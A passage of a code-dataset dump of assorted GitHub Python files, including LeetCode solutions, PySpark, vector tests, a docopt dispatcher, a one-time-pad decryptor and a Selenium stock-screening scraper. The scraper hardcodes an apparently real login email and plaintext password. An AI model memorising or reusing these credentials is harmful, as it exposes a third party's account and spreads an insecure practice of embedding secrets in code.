解释:不存在满足题目要求的 k ,返回 -1 。\n# \n# \n# \n# \n# 提示:\n# \n# \n# 1 <= nums.length <= 1000\n# -1000 <= nums[i] <= 1000\n# nums[i] != 0\n# \n# \n#\n\n# @lc code=start\n\nfrom typing import List\n\nclass Solution:\n def findMaxK(self, nums: List[int]) -> int:\n nums.sort()\n i = 0\n j = len(nums) - 1\n while i < len(nums) and nums[i] < 0:\n cur = nums[i]\n while j > i and nums[j] > -cur:\n j -= 1\n if j == i:\n return -1\n \n if nums[j] < -cur:\n i += 1\n continue\n \n return -cur\n \n return -1\n\n\n# @lc code=end\n\n","repo_name":"xiaohejun/fantastic-acm","sub_path":"leetcode/2441.与对应负数同时存在的最大正整数.py","file_name":"2441.与对应负数同时存在的最大正整数.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18739417427","text":"from pyspark.sql import SparkSession, Row\nfrom pyspark.sql import functions as func\n\nspark = SparkSession.builder.appName(\"test\").getOrCreate()\n\npeople = spark.read.option(\"header\", \"true\").option('inferSchema',\"true\").csv(\"file:///sparkcourse/fakefriends-header.csv\")\n\npeople.printSchema()\n\npeoplefil = people.select(\"age\",\"friends\")\n\npeople.groupby(\"age\").avg().select(\"age\",\"avg(friends)\").sort(\"age\").show()\n\npeople.groupby(\"age\").agg(func.round(func.avg(\"friends\"),2).alias(\"friends_avg\")).sort(\"age\").show()\n\nspark.stop()\n","repo_name":"Prmnk/pyspark_v1","sub_path":"spsqltest.py","file_name":"spsqltest.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25110297757","text":"from enum import Enum\nimport ast\nimport itertools\n\nMASK_SIZE = 36\n\n\nclass Memory(dict):\n def __init__(self):\n self.currect_mask = None\n super().__init__()\n\n def run(self, instruction):\n if isinstance(instruction, Mask):\n self.currect_mask = instruction\n return\n\n if isinstance(instruction, Set):\n # self._set_instruction_a(instruction)\n self._set_instruction_b(instruction)\n return\n\n raise Exception(\"Invalid instruction\")\n\n def _set_instruction_a(self, instruction):\n binary = apply_mask_a(self.currect_mask.mask, instruction.expand_value())\n new_value = int(binary, 2)\n self[instruction.address] = new_value\n\n def _set_instruction_b(self, instruction):\n new_mask = apply_mask_b(self.currect_mask.mask, instruction.expand_address())\n for address in new_mask.expand_mask():\n new_address = int(address.mask_binary(), 2)\n self[new_address] = instruction.value\n\n\nclass MaskValue(Enum):\n Zero = \"0\"\n One = \"1\"\n Keep = \"X\"\n\n\nclass Instruction:\n pass\n\n\nclass Mask(Instruction):\n def __init__(self, mask):\n self.mask = self._transform_mask(mask)\n\n @staticmethod\n def raw(mask_list):\n mask = Mask(\"\")\n mask.mask = mask_list\n return mask\n\n def expand_mask(self):\n counter = self.mask.count(MaskValue.Keep)\n if counter == 0:\n return [self.mask]\n\n result = {x: [] for x in range(2 ** counter)}\n\n what_x = 0\n for value in self.mask:\n if value != MaskValue.Keep:\n for key in result.keys():\n result[key].append(value)\n\n if value == MaskValue.Keep:\n for (index, subs) in enumerate(\n itertools.product([MaskValue.Zero, MaskValue.One], repeat=counter)\n ):\n result[index].append(subs[what_x])\n\n what_x += 1\n\n return [Mask(mask_list) for mask_list in result.values()]\n\n def mask_binary(self):\n return \"\".join([mask_value.value for mask_value in self.mask])\n\n @staticmethod\n def _transform_mask(mask):\n return [MaskValue(x) for x in mask]\n\n def __repr__(self):\n return f\"Mask(mask={self.mask})\"\n\n\nclass Set(Instruction):\n def __init__(self, address, value):\n self.address = address\n self.value = value\n\n def expand_address(self):\n return expand_integer(self.address)\n\n def expand_value(self):\n return expand_integer(self.value)\n\n def __repr__(self):\n return f\"Set(address={self.address}, value={self.value})\"\n\n\ndef parse_line(line):\n # instructions are valid python-like statements :+1:\n # only the mask 1XX1XX is not valid python :(\n\n if line.startswith(\"mask\"):\n return Mask(line.replace(\"mask = \", \"\"))\n\n if line.startswith(\"mem\"):\n tree = ast.parse(line)\n assign = tree.body[0]\n\n _mem = assign.targets[0].value.id\n address = assign.targets[0].slice.value.value\n value = assign.value.value\n return Set(address, value)\n\n raise Exception(\"invalid line\")\n\n\ndef apply_mask_a(mask, binary_str):\n binary_list = []\n for (a, b) in zip(mask, binary_str):\n if a == MaskValue.Keep:\n binary_list.append(b)\n continue\n\n if a == MaskValue.One:\n binary_list.append(\"1\")\n continue\n\n if a == MaskValue.Zero:\n binary_list.append(\"0\")\n continue\n\n binary = \"\".join(binary_list)\n return binary\n\n\ndef apply_mask_b(mask, binary_str):\n mask_list = []\n for (a, b) in zip(mask, binary_str):\n if a == MaskValue.Keep:\n mask_list.append(MaskValue.Keep)\n continue\n\n if a == MaskValue.One:\n mask_list.append(MaskValue.One)\n continue\n\n if a == MaskValue.Zero:\n mask_list.append(MaskValue(b))\n continue\n\n return Mask.raw(mask_list)\n\n\ndef expand_integer(integer):\n return f\"{integer:0{MASK_SIZE}b}\"\n\n\ndef main():\n with open(\"data.txt\") as f:\n data = f.read().splitlines()\n instructions = [parse_line(x) for x in data]\n\n m = Memory()\n\n for i in instructions:\n m.run(i)\n\n print(sum(m.values()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"thomas9911/aoc2020","sub_path":"day14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14851891293","text":"# -*- coding : utf-8 -*-\nimport math\n\nimport pytest\n\nfrom geometry import Vector\n\n\ndef test_vector_generation():\n Vector([1, 2, 3])\n Vector(i for i in range(10))\n\n with pytest.raises(ValueError):\n Vector([\"1\", \"2\", \"3\"])\n\n\ndef test_vector_neg():\n v1 = Vector([1, 2, 3])\n assert -v1 == Vector([-1, -2, -3])\n\n\ndef test_vector_add():\n v1 = Vector([1, 2, 3])\n v2 = Vector([1, 2, 3])\n\n v3 = v1 + v2\n assert v3 == Vector([2, 4, 6])\n\n\ndef test_vector_sub():\n v1 = Vector([1, 2, 3])\n v2 = Vector([1, 2, 3])\n\n v3 = v1 - v2\n assert v3 == Vector([0, 0, 0])\n\n\ndef test_vector_mul():\n v1 = Vector([1, 2, 3])\n v2 = Vector([1, 2, 3])\n\n v3 = v1 * v2\n assert v3 == Vector([1, 4, 9])\n\n\ndef test_vector_div():\n v1 = Vector([1, 2, 3])\n v2 = Vector([1, 2, 3])\n\n v3 = v1 / v2\n assert v3 == Vector([1, 1, 1])\n\n\ndef test_vector_pow():\n v1 = Vector([2, 2, 2, 2])\n exp = 2\n v2 = Vector([1, 2, 3, 4])\n assert v1 ** exp == Vector([4, 4, 4, 4])\n assert v1 ** v2 == Vector([2, 4, 8, 16])\n\n\ndef test_vector_append():\n v1 = Vector([1, 2, 3])\n v1.append(4)\n assert v1 == Vector([1, 2, 3, 4])\n\n\ndef test_vector_extend():\n v1 = Vector([1, 2])\n v1.extend([3, 4, 5])\n assert v1 == Vector([1, 2, 3, 4, 5])\n\n\ndef test_vector_magnitude():\n v1 = Vector([3, 4, 12])\n assert v1.magnitude() == 13\n\n\ndef test_vector_scaling():\n v1 = Vector([1, 1, 1])\n assert v1.scale(2) == Vector([2, 2, 2])\n\n\ndef test_vector_normalize():\n v1 = Vector([4, 5, 6])\n normed = v1.normalize()\n assert normed.is_unit_vector()\n\n\ndef test_vector_dot():\n v1 = Vector([1, 2, 3])\n v2 = Vector([1, 2, 3])\n assert v1.dot(v2) == 14\n\n\ndef test_vector_cross():\n v1 = Vector([2, 3])\n v2 = Vector([1, 7])\n assert v1.cross(v2) == Vector([11])\n\n v3 = Vector([2, 7, 4])\n v4 = Vector([3, 9, 8])\n assert v3.cross(v4) == Vector([20, -4, -3])\n\n assert v1.cross(v3) == Vector([12, -8, 8])\n assert v4.cross(v2) == Vector([-56, 8, 12])\n\n\ndef test_vector_angle():\n v1 = Vector([1, 0, 0])\n v2 = Vector([0, 1, 0])\n assert math.isclose(v1.angle(v2), math.pi / 2, rel_tol=1e-04)\n\n\ndef test_vector_parallel():\n v1 = Vector([1, 1, 1])\n v2 = Vector([3, 3, 3])\n v3 = Vector([0, 1, 0])\n\n assert v1.is_parallel(v2)\n assert not v2.is_parallel(v3)\n assert not v3.is_parallel(v1)\n\n\ndef test_vector_antiparallel():\n v1 = Vector([1, 1, 1])\n v2 = Vector([-1, -1, -1])\n v3 = Vector([0, 0, 1])\n\n assert v1.is_antiparallel(v2)\n assert not v2.is_antiparallel(v3)\n assert not v3.is_antiparallel(v1)\n\n\ndef test_vector_orthogonal():\n v1 = Vector([1, 0, 0])\n v2 = Vector([0, 1, 0])\n v3 = Vector([0, 0, 1])\n v4 = Vector([1, 1, 1])\n\n assert v1.is_orthogonal(v2)\n assert v2.is_orthogonal(v3)\n assert v3.is_orthogonal(v1)\n assert not v1.is_orthogonal(v4)\n","repo_name":"fR0zTy/geometry","sub_path":"geometry/object/test/test_vector.py","file_name":"test_vector.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5323666329","text":"\ndef s2_check_till_sqrt(upper_bound):\n\n check_times = 0\n prime_number_list = []\n\n for prime_candidate in range(2, upper_bound + 1):\n\n sqrt_of_prime_candidate = int(prime_candidate ** 0.5) + 1\n\n for potential_factor in range(2, sqrt_of_prime_candidate + 1): # if prime candidate is 41, check from 2 to 7\n check_times += 1\n if prime_candidate % potential_factor == 0:\n break\n else:\n prime_number_list.append(prime_candidate)\n\n '''\n if break clause is not triggered, else cause will be triggered.\n '''\n\n print(f\"In total, it takes {check_times} times. \")\n return prime_number_list\n\n\n'''\nHOMEWORK:\nExplain clearly, why if we check till square root, then it is good enough already? \n'''\n\n\nl1 = s2_check_till_sqrt(10000)\nprint(l1)\n","repo_name":"Coding-PIGGY/PythonClass03","sub_path":"program3/python_0148_practice_find_prime_numbers_s2.py","file_name":"python_0148_practice_find_prime_numbers_s2.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6118526361","text":"import functools\nimport logging\nimport os\nimport re\nimport sys\nfrom inspect import getdoc\n\nfrom docopt import docopt\nfrom docopt import DocoptExit\n\n\nlog = logging.getLogger(__name__)\n\n\ndef dispatch(command_classes, before_f=None, args=None, env=None):\n if not args:\n args = sys.argv[1:]\n try:\n handler, options = parse(command_classes, docopt_opts={'options_first': True},\n args=args, env=None)\n except NoSuchCommand as e:\n commands = '\\n'.join(parse_section('commands:', getdoc(e.container)))\n log.error(f'No such command: {e.command}\\n{commands}')\n sys.exit(1)\n\n if before_f:\n before_f(handler, options)\n handler(options)\n\n\ndef parse(command_classes, command='__root__', command_opts=None, docopt_opts={},\n args=None, env=None):\n command_class = command_classes.get(command)\n if not command_class:\n raise Exception()\n command_help = getdoc(command_class)\n if not command_opts:\n command_opts = {}\n command_opts.update(_docopt(command_help, args, **docopt_opts))\n command = command_opts['COMMAND']\n command = command.replace('-', '_')\n\n if command in command_classes:\n return parse(command_classes, command=command, command_opts=command_opts,\n docopt_opts=docopt_opts, args=[command] + command_opts['ARGS'])\n\n if not command or command in ('-h', '--help'):\n raise SystemExit(command_help)\n\n command_handler = get_handler(command_class, command)\n command_help = getdoc(command_handler)\n if command_help is None:\n raise NoSuchCommand(command, command_class)\n\n command_opts.update(_docopt(command_help, command_opts['ARGS'], options_first=True))\n if env:\n prefix = f'{env}_'\n env_option_keys = ((k, prefix + k.lstrip('-').replace('-', '_').upper())\n for k in command_opts.keys())\n env_options = {opt_key: os.environ[env_key]\n for opt_key, env_key in env_option_keys\n if env_key in os.environ}\n command_opts = {**env_options, **command_opts}\n\n return command_handler, command_opts\n\n\ndef _docopt(docstring, *args, **kwargs):\n try:\n return docopt(docstring, *args, **kwargs)\n except DocoptExit:\n raise SystemExit(docstring)\n\n\ndef get_handler(command_class, command):\n command_name = command.replace('-', '_')\n if not hasattr(command_class, command_name):\n raise NoSuchCommand(command, command_class)\n instance = command_class()\n return getattr(instance, command)\n\n\n# From docopt@master\ndef parse_section(name, source):\n pattern = re.compile('^([^\\n]*' + name + '[^\\n]*\\n?(?:[ \\t].*?(?:\\n|$))*)',\n re.IGNORECASE | re.MULTILINE)\n return [s.strip() for s in pattern.findall(source)]\n\n\nclass NoSuchCommand(Exception):\n def __init__(self, command, container):\n super().__init__(f'No such command: {command}')\n self.command = command\n self.container = container\n","repo_name":"ucalgary/docopt-utils","sub_path":"docopt_utils/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14830508305","text":"from turtle import *\nbok=7\nspeed('fastest')\n\ndef kwadrat(bok,kolor):\n fillcolor(kolor)\n begin_fill()\n for i in range(4):\n fd(bok)\n rt(90)\n end_fill()\n \ncolormode(255)\ntracer(0,1)\npu()\ngoto(-100,100)\npd()\n\nfor wiersze in open('obrazek tekstowy.txt').readlines():\n L=wiersze.split()\n for i in range(len(L)):\n kolor=eval(L[i])\n kwadrat(bok,kolor)\n pu()\n rt(90)\n fd(bok)\n lt(90)\n pd()\n pu()\n fd(bok)\n lt(90)\n fd(len(L)*bok)\n rt(90)\n pd()\n \n\n","repo_name":"miloczek/Projekty-II-UWR","sub_path":"my python/Zadanie python/lista 7/krowa.py","file_name":"krowa.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1180073724","text":"\n#you need to add the encoding parameter at all times\n#it will spit out nonsense if you don't\nwith open('secretMessage.txt','r',encoding='utf-8') as sm:\n mesg_content = sm.read()\n\nwith open('pad.txt','r',encoding='utf-8') as pad:\n pad_content = pad.read()\n\n\"\"\"\nHOW THIS WORKS \n similar to encrypting, but instead of the message we feed it the cipher text\n and the pad that used was for encrypting\n\"\"\"\ndef decrypt(message,pad):\n plaintext = \"\"\n for i,j in zip(message,pad):\n xored_value = ord(i) ^ ord(j)\n plaintextvalue = chr(xored_value)\n plaintext +=(plaintextvalue)\n return plaintext\n\nmessage = decrypt(mesg_content,pad_content)\nwith open('TheMessage','w+',encoding='utf-8') as TheMessage:\n TheMessage.write(message)","repo_name":"GreenArthur/OneTimePad","sub_path":"DecryptionOTP.py","file_name":"DecryptionOTP.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28076676249","text":"import random\nfrom os import mkdir\nfrom os.path import basename, exists, join\n\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torch.nn import functional as F\nfrom tqdm import tqdm as tqdm\nimport torchvision.transforms as transforms\n\nfrom dcgan_models import Encoder, Generator\nfrom utils import get_jpg_images, load_encoder, load_generator, denorm\n\n\ndef generate_pix2pix_dataset(generator_params, encoder_params, input_dataset_path='shoes_images', dcgan_image_size=64, pix2pix_image_size=128, output_path='pix2pix/datasets/details_dataset'):\n phases = ['train','test']\n\n out_A_path = join(output_path,'A')\n out_B_path = join(output_path,'B')\n out_AB_path = join(output_path,'AB')\n\n for path in (out_A_path, out_B_path, out_AB_path):\n if not exists(path):\n mkdir(path)\n for phase in phases:\n if not exists(join(path,phase)):\n mkdir(join(path,phase))\n\n # useful transforms\n transform = transforms.Compose([transforms.Resize((dcgan_image_size,dcgan_image_size), Image.LANCZOS),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\n\n interpolate = lambda x: F.interpolate(x, scale_factor=pix2pix_image_size/dcgan_image_size, mode='bilinear')\n\n # Load DCGAN models:\n G = load_generator(**generator_params)\n E = load_encoder(**encoder_params)\n\n # Iterate on images\n images_list = get_jpg_images(input_dataset_path)\n random.Random(5).shuffle(images_list) # shuffle dataset with a constant seed (5) for consistency\n phase_cutoffs = [0.95*len(images_list), len(images_list)]\n cur_phase = 0\n for i, image_file in tqdm(enumerate(images_list)):\n if i > phase_cutoffs[cur_phase]:\n cur_phase += 1\n with Image.open(image_file) as image:\n in_image = transform(image.convert(\"RGB\")).cuda()\n if tuple(in_image.shape[-3:]) != (3,dcgan_image_size,dcgan_image_size):\n print(f\"WARNING! Unexpected input size: {in_image.shape} in file {image_file}. Skipping...\")\n continue\n B_image = image.resize((pix2pix_image_size,pix2pix_image_size), Image.BILINEAR)\n B_image.save(join(out_B_path,phases[cur_phase],basename(image_file)[:-3]+\"png\"))\n generated_image = G(E(in_image.reshape(1,3,dcgan_image_size,dcgan_image_size)))\n upsampled = interpolate(generated_image)\n fixed_point = np.uint8(np.round(255*denorm(upsampled).cpu().numpy()))[0,...]\n fixed_point = np.transpose(fixed_point, (1,2,0))\n A_image = Image.fromarray(fixed_point)\n A_image.save(out_A_path+'/'+phases[cur_phase]+'/'+basename(image_file)[:-3]+\"png\")\n \n w, h = A_image.size\n AB_image = Image.new(\"RGB\", (2*w, h))\n AB_image.paste(A_image, (0,0))\n AB_image.paste(B_image, (w,0))\n AB_image.save(join(out_AB_path,phases[cur_phase],basename(image_file)[:-3]+\"png\"))\n","repo_name":"drorsimon/image_barycenters","sub_path":"generate_pix_dataset.py","file_name":"generate_pix_dataset.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"70290060213","text":"\nimport codecs\n\nimport time\nfrom tkinter import messagebox\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom PIL import ImageGrab\nimport requests\nimport openpyxl\nfrom openpyxl.utils import get_column_letter\n\n\n\n\"\"\"\nisStatusCodeNomal\n@param URL 取得するURL\n\"\"\" \ndef isStatusCodeNomal(URL):\n res = requests.get(URL)\n isStatus = res.status_code\n print(res.status_code)\n return isStatus\n \n\"\"\"\ndriverOpen\n@param URL 取得するURL\n\"\"\" \n\n\n \n\"\"\"\ngetCurrentTextPage\n@param className HTMLページのクラスを指定\n@return tagList\n\"\"\" \ndef getCurrentTextPage(className):\n #カレントページを取得する\n html =driver.page_source.encode('utf-8')\n #読み込む情報を解析する。\n soup = BeautifulSoup(html, 'html.parser')\n #指定のクラスを リストで取得する。\n tagList = soup.select(className)\n \n mylist = []\n with codecs.open('file.txt', 'w' , 'utf-8') as f:\n for item in tagList:\n if item.find('div') is not None:\n print(item.find('div').text, file=f)\n \n'''\nテキスト挿入\n'''\ndef sendKey(xpath , string ):\n elem = driver.find_element(By.XPATH,xpath).send_keys(string)\n time.sleep(1)\n \n'''\n画面クリック\n'''\ndef clicKey(xpath):\n elem = driver.find_element(By.XPATH,xpath)\n driver.execute_script(\"arguments[0].click();\" , elem) \n time.sleep(1)\n\ndef init(path,profile): \n options = webdriver.ChromeOptions()\n options.add_argument('--user-data-dir=' +str(path))\n options.add_argument('--profile-directory=' +str(profile)) # この行を省略するとDefaultフォルダが指定されます\n driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()) , options = options )\n return driver\n \n\"\"\"\nmainMethod\n@param void\n\"\"\"\nif __name__ == '__main__':\n options = webdriver.ChromeOptions()\n \n with webdriver.Chrome(ChromeDriverManager().install() , options= options) as driver:\n print(\"処理を開始します。\")\n time.sleep(2)\n \n \n URL =\"https://id.toyokeizai.net/sol/?return_to=%2Fscreening\"\n driver.set_window_size(1280, 720)\n driver.maximize_window()\n driver.get(URL)\n time.sleep(1)\n\n #mailAddressを挿入\n sendKey('//*[@id=\"tkz_id\"]' , 'tosinobu117@hotmail.com' )\n #Passwordを挿入\n sendKey('//*[@id=\"password\"]' , 'Reij5371' )\n #loginボタンクリック\n driver.save_screenshot('screenshot_login.png')\n time.sleep(1)\n clicKey('//*[@id=\"mailLogin\"]/div/p[1]/input')\n\n #保存した検索結果のダイアログクリック\n clicKey('//*[@id=\"pageTop\"]/div[1]/div/div[2]/div/ul/li[3]/div[1]')\n driver.save_screenshot('screenshot_daialog.png')\n time.sleep(1)\n \n #対象の検索条件をクリック\n time.sleep(1)\n clicKey('//*[@id=\"pageTop\"]/div[1]/div/div[2]/div/ul/li[3]/div[2]/ul/div[2]/div/li[26]')\n driver.save_screenshot('screenshot_reserchWord.png')\n time.sleep(1)\n \n #検索をクリック\n clicKey('//*[@id=\"pageTop\"]/div[1]/div/div[2]/div/div/div/div/button')\n time.sleep(3)\n\n \n window_after = driver.window_handles[1]\n #seleniumの操作対象を当初から開いているウインドウに切り替える\n driver.switch_to.window(window_after)\n driver.save_screenshot('screenshot_result.png')\n #カレントページの取得\n\n #指定のURLのクラスからデータを取得する\n #className = \"[class*='vgt-left-align -MIC001']\"\n className = \"[class*='vgt-left-align -no']\"\n taglist = getCurrentTextPage(className)\n\n \n print('処理を終了します')","repo_name":"tktktakatsuka/pythonTools","sub_path":"sikihou/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29629632254","text":"import tensorflow as tf\n\nfrom src.model.metric import compute_bleu\n\n\ndef get_sentence(x, start=\"\", end=\"\", pad=\"\"):\n \"\"\"\n\n Args:\n x: list of words tokenized by preprocessor\n\n Returns:\n string without control tokens\n\n \"\"\"\n ctl_tokens = [start, end, pad]\n ret = []\n for each in x:\n if each not in ctl_tokens:\n ret.append(each)\n elif each == end:\n break\n\n return \" \".join(ret)\n\n\ndef get_bleu_score(x, y):\n \"\"\"\n\n Args:\n x: list of original sentences\n y: list of inferenced sentences\n\n Returns:\n mean value of bleu scores\n \"\"\"\n scores = []\n for _x, _y in zip(x, y):\n if isinstance(_x, str):\n _x, _y = _x.split(), _y.split()\n reference_corpus = [[get_sentence(_x)]]\n translation_corpus = [get_sentence(_y)]\n bleu_elements = compute_bleu(\n reference_corpus, translation_corpus, max_order=4, smooth=False\n )\n bleu_score = bleu_elements[0]\n scores.append(bleu_score)\n return sum(scores) / len(scores)\n\n\ndef create_look_ahead_mask(seq_len):\n mask = []\n for i in range(seq_len):\n mask.append([0] * (i + 1) + [1] * (seq_len - i - 1))\n mask = tf.constant(mask, dtype=tf.float32, shape=(seq_len, seq_len))\n mask = mask[tf.newaxis, tf.newaxis, :, :]\n assert mask.shape == (1, 1, seq_len, seq_len)\n return mask\n\n\ndef create_pad_mask(x, pad_idx=0):\n \"\"\"PAD -> Mask\"\"\"\n batch_size = x.shape[0]\n seq_len = x.shape[1]\n mask = tf.cast(tf.math.equal(x, pad_idx), dtype=tf.float32)\n mask = mask[:, tf.newaxis, tf.newaxis, :]\n assert mask.shape == (batch_size, 1, 1, seq_len)\n return mask\n","repo_name":"minhyeoky/machine-translation","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73001665973","text":"# coding:utf-8\n# @Time : 2022/6/28 16:35 \n# @Author : clf\n# @File : demo7.py.py \n# @Software: PyCharm\ndict_ticket={'G1569':['北京南=天津南','18:05','18:39','00:34'],\n 'G1567':['北京南=天津南','18:15','18:49','00:34'],\n 'G8917':['北京南=天津南','18:20','19:19','00:59'],\n 'G203':['北京南=天津南','18:35','19:09','00:34'],\n }\nprint('车次\\t\\t出发站-到达站\\t出发时间\\t到达时间\\t历时时长')\nfor item in dict_ticket:\n print(item,end=' ')\n for i in dict_ticket[item]:\n print(i,end=' ')\n print()\n\ntrain_no=input('请输入要购买的车次:')\npersons=input('请输入乘车人,如果是多人请使用逗号分隔')\ns=f'您已购买了{train_no}次列车'\ns_info=dict_ticket[train_no] #获取车次详细信息\ns += s_info[0]+' '+s_info[1]+'开,'\nprint(f'{s}请{persons}尽快取走纸质车票。【铁路客服】')","repo_name":"ChenLiufeng/PythonPrograming","sub_path":"chap13/实操案例三/demo7.py","file_name":"demo7.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888382132","text":"class Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n cnt = [0]*len(nums) # store the count of the LIS ends with nums[i]\n length = [0]*len(nums) # store the longest increasing subseq ends with nums[i]\n maxL = float('-inf')\n res = 0\n for i in range(len(nums)):\n length[i] = cnt[i] = 1\n for j in range(i):\n if nums[i] > nums[j]:\n if length[i] == length[j]+1:\n cnt[i] += cnt[j]\n elif length[i] < length[j]+1:\n length[i] = length[j]+1\n cnt[i] = cnt[j]\n if maxL < length[i]:\n maxL = length[i]\n res = cnt[i]\n elif maxL == length[i]:\n res += cnt[i]\n return res\n \nif __name__ == '__main__':\n s = Solution()\n print(s.findNumberOfLIS([2,2,2,2,2])) # 5","repo_name":"xiaofanc/leetcode","sub_path":"0673-number-of-longest-increasing-subsequence.py","file_name":"0673-number-of-longest-increasing-subsequence.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2144885349","text":"import pandas as pd\nfrom joblib import Parallel, delayed\nfrom googletrans import Translator\n\ntranslator = Translator()\n\n\ndef translate(filepath, column_to_translate):\n df = pd.read_csv(filepath)\n\n for column in column_to_translate:\n translated_col = Parallel(n_jobs=8)(delayed(_translate)(i) for i in df[column].unique())\n translated_col = pd.DataFrame(translated_col, columns=[column, '{}_en'.format(column)])\n df = df.merge(translated_col, on=[column], how='left')\n df = df.drop(column, axis=1)\n df = df.rename(index=str, columns={'{}_en'.format(column): column})\n\n return df\n\n\ndef _translate(x):\n translated = x\n try:\n translated = translator.translate(x, src='ru', dest='en').text\n except Exception as e:\n # print(e)\n pass\n return x, translated\n","repo_name":"minerva-ml/open-solution-avito-demand-prediction","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"28393934933","text":"\"\"\"\n给定两个由小写字母构成的字符串 A 和 B ,\n只要我们可以通过交换 A 中的两个字母得到与 B 相等的结果,\n就返回 true ;否则返回 false 。\n示例 1:\n\n输入: A = \"ab\", B = \"ba\"\n输出: true\n示例 2:\n\n输入: A = \"ab\", B = \"ab\"\n输出: false\n示例 3:\n\n输入: A = \"aa\", B = \"aa\"\n输出: true\n示例 4:\n\n输入: A = \"aaaaaaabc\", B = \"aaaaaaacb\"\n输出: true\n示例 5:\n\n输入: A = \"\", B = \"aa\"\n输出: false\n \n\n提示:\n\n0 <= A.length <= 20000\n0 <= B.length <= 20000\nA 和 B 仅由小写字母构成。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/buddy-strings\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\"\"\"\n思路:\n1. 字符串长度不相等, 直接返回false\n2. 字符串相等的时候, 只要有重复的元素就返回true\n3. A, B字符串有不相等的两个地方, 需要查看它们交换后是否相等即可.\n\"\"\"\n\ndef buddyStrings(A, B):\n if len(A) != len(B):\n return False\n if A == B and len(set(A)) < len(A):\n return True\n dif = [(a,b) for a,b in zip(A, B) if a!=b]\n return len(dif) == 2 and dif[0] == dif[1][::-1]\n \n\nA = input(\"输入A:\")\nB = input(\"输入B:\")\nprint(buddyStrings(A, B))","repo_name":"Cheney320/LeetCode-","sub_path":"day2/859.py","file_name":"859.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"86745921554","text":"import os\nimport sys\nfrom contextlib import contextmanager\n\n\ndef tail(f, n):\n assert n >= 0\n pos, lines = n + 1, []\n\n # set file pointer to end\n\n f.seek(0, os.SEEK_END)\n\n isFileSmall = False\n\n while len(lines) <= n:\n try:\n f.seek(f.tell() - pos, os.SEEK_SET)\n except ValueError as e:\n # lines greater than file seeking size\n # seek to start\n f.seek(0, os.SEEK_SET)\n isFileSmall = True\n except IOError:\n print(\"Some problem reading/seeking the file\")\n sys.exit(-1)\n finally:\n lines = f.readlines()\n if isFileSmall:\n break\n\n pos *= 2\n\n return lines[-n:]\n\n\n@contextmanager\ndef open_potentially_compressed_file(f: str, mode: str = \"r\"):\n opfunc = open\n if f.endswith(\".gz\"):\n import gzip\n\n opfunc = gzip.open\n\n with opfunc(f, mode=mode) as fp:\n yield fp\n","repo_name":"PMCC-BioinformaticsCore/janis-assistant","sub_path":"janis_assistant/utils/fileutil.py","file_name":"fileutil.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18405098759","text":"import itertools; import math; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from heapq import *; import unittest; from typing import List;\ndef get_sol(): return Solution()\nclass Solution:\n def twoOutOfThree(self, nums1: List[int], nums2: List[int], nums3: List[int]) -> List[int]:\n sett1 = set(nums1)\n sett2 = set(nums2)\n sett3 = set(nums3)\n res = []\n count = Counter()\n for x in sett1: count[x]+=1\n for x in sett2: count[x]+=1\n for x in sett3: count[x]+=1\n for x in count:\n if count[x]>=2:\n res.append(x)\n return res\n\n\nclass MyTestCase(unittest.TestCase):\n def test1(self):\n nums1,nums2,nums3 = [1,1,3,2], [2,3], [3]\n Output= sorted([3,2])\n self.assertEqual(Output, sorted(get_sol().twoOutOfThree(nums1,nums2,nums3)))\n def test2(self):\n 